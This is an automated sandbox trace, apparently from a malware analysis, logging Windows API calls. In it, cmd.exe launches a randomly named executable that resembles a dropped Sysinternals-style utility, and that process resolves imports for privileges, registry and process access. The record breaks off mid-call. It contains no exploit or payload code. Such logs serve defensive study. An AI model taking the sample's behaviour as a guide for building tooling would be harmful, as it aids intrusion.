[0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0131.540] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0131.541] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0131.542] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0131.543] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0131.544] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0131.544] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0131.544] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0131.544] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0131.544] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0131.544] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0131.544] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0131.544] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0131.545] GetProcessHeap () returned 0x6b0000 [0131.545] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x210) returned 0x6c2488 [0131.545] GetProcessHeap () returned 0x6b0000 [0131.545] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x72) returned 0x6c8fb8 [0131.545] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0131.552] GetProcessHeap () returned 0x6b0000 [0131.552] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x418) returned 0x6c26a0 [0131.552] SetErrorMode (uMode=0x0) returned 0x0 [0131.552] SetErrorMode (uMode=0x1) returned 0x0 [0131.552] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6c26a8, lpFilePart=0x24f1a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24f1a0*="Desktop") returned 0x25 [0131.552] SetErrorMode (uMode=0x0) returned 0x1 [0131.552] GetProcessHeap () returned 0x6b0000 [0131.552] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6c26a0, Size=0x6e) returned 0x6c26a0 [0131.552] GetProcessHeap () returned 0x6b0000 [0131.552] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6c26a0) returned 0x6e [0131.552] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.552] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0131.553] GetProcessHeap () returned 0x6b0000 [0131.553] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x120) returned 0x6c2718 [0131.553] GetProcessHeap () returned 0x6b0000 [0131.553] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x238) returned 0x6c2840 [0131.565] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x24ef3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ef3c) returned 0x6c29f0 [0131.565] GetProcessHeap () returned 0x6b0000 [0131.565] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6c2a30 [0131.566] FindClose (in: hFindFile=0x6c29f0 | out: hFindFile=0x6c29f0) returned 1 [0131.566] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0131.566] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0131.566] GetConsoleTitleW (in: lpConsoleTitle=0x24f414, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.707] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f29c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f364 | out: lpAttributeList=0x24f29c, lpSize=0x24f364) returned 1 [0131.707] UpdateProcThreadAttribute (in: lpAttributeList=0x24f29c, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f35c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f29c, lpPreviousValue=0x0) returned 1 [0131.707] GetStartupInfoW (in: lpStartupInfo=0x24f258 | out: lpStartupInfo=0x24f258*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0131.743] CloseHandle (hObject=0x74) returned 1 [0131.743] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0131.743] GetProcessHeap () returned 0x6b0000 [0131.743] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c2d70 | out: hHeap=0x6b0000) returned 1 [0131.743] GetEnvironmentStringsW () returned 0x6c2c90* [0131.743] GetProcessHeap () returned 0x6b0000 [0131.743] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb84) returned 0x6caf20 [0131.743] FreeEnvironmentStringsW (penv=0x6c2c90) returned 1 [0131.743] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0140.796] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x24f238 | out: lpExitCode=0x24f238*=0x1) returned 1 [0140.797] CloseHandle (hObject=0x78) returned 1 [0140.797] _vsnwprintf (in: _Buffer=0x24f380, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f244 | out: _Buffer="00000001") returned 8 [0140.797] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0140.797] GetProcessHeap () returned 0x6b0000 [0140.797] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6caf20 | out: hHeap=0x6b0000) returned 1 [0140.797] GetEnvironmentStringsW () returned 0x6c2c90* [0140.797] GetProcessHeap () returned 0x6b0000 [0140.797] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb84) returned 0x6caf20 [0140.797] FreeEnvironmentStringsW (penv=0x6c2c90) returned 1 [0140.797] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0140.797] GetProcessHeap () returned 0x6b0000 [0140.798] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6caf20 | out: hHeap=0x6b0000) returned 1 [0140.798] GetEnvironmentStringsW () returned 0x6c2c90* [0140.798] GetProcessHeap () returned 0x6b0000 [0140.798] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb84) returned 0x6caf20 [0140.798] FreeEnvironmentStringsW (penv=0x6c2c90) returned 1 [0140.798] GetProcessHeap () returned 0x6b0000 [0140.798] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c00d0 | out: hHeap=0x6b0000) returned 1 [0140.798] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f29c | out: lpAttributeList=0x24f29c) [0140.798] _get_osfhandle (_FileHandle=1) returned 0x80 [0140.798] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0140.798] _get_osfhandle (_FileHandle=1) returned 0x80 [0140.798] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0140.799] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.799] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0140.799] SetConsoleInputExeNameW () returned 0x1 [0140.799] GetConsoleOutputCP () returned 0x1b5 [0140.800] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0140.800] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.800] exit (_Code=1) Process: id = "139" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x36bea000" os_pid = "0x5e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "138" os_parent_pid = "0xb1c" cmd_line = "tdq963ii.exe -accepteula \"jnwdui.dll.mui\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 629 os_tid = 0x99c [0133.136] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0133.137] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0133.137] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0133.137] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0133.138] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0133.138] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0133.138] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0133.138] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0133.138] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0133.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0133.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0133.139] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0133.139] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0133.139] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0133.139] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0133.139] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0133.139] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0133.139] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0133.140] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0133.140] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0133.140] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0133.140] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0133.140] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0133.140] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0133.140] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0133.140] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0133.141] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0133.141] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0133.141] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0133.141] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0133.141] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0133.141] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0133.141] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0133.141] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0133.142] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0133.142] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0133.142] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0133.142] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0133.142] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0133.143] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0133.143] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0133.143] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0133.143] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0133.143] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0133.143] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0133.144] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0133.144] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0133.144] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0133.144] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0135.665] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0135.665] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0135.666] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0135.666] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0135.666] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0135.666] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0135.666] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0135.667] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0135.667] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0135.667] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0135.667] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0135.667] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0135.668] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0135.668] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0135.668] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0135.668] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0135.668] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0135.669] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0135.669] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0135.669] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0135.669] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0135.669] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0135.670] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0135.670] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0135.670] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0135.670] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0135.670] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0135.670] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0135.671] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0135.671] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0135.671] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0135.671] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0135.671] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0135.671] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0135.672] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0135.672] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0135.672] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0135.672] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0135.672] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0135.673] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0135.673] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0135.673] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0135.673] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0135.674] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0135.674] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0135.674] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0135.674] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0135.674] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0135.675] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0135.675] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0135.675] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0135.675] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0135.675] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0135.676] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0135.676] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0135.676] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0135.676] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0135.677] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0135.677] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0135.677] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0135.678] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0135.678] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0135.678] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0135.678] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0135.679] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0135.679] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0135.679] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0135.679] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0135.680] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0135.680] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0135.680] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0135.680] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0135.681] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0135.681] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0135.681] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0135.681] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0135.681] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0135.681] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0135.682] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0135.685] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x11ea3d80, dwHighDateTime=0x1d68287)) [0135.685] GetCurrentThreadId () returned 0x99c [0135.685] GetCurrentProcessId () returned 0x5e4 [0135.685] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=25602424830) returned 1 [0135.691] GetProcessHeap () returned 0x500000 [0136.717] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0136.718] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0136.718] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0136.718] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0136.718] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0136.718] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0136.719] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0136.719] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0136.719] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0136.719] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0136.719] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0136.719] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0136.720] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0136.720] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0136.720] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0136.720] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0136.720] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0136.720] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0136.721] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0136.721] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0136.721] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0136.721] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0136.721] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0136.721] GetProcAddress 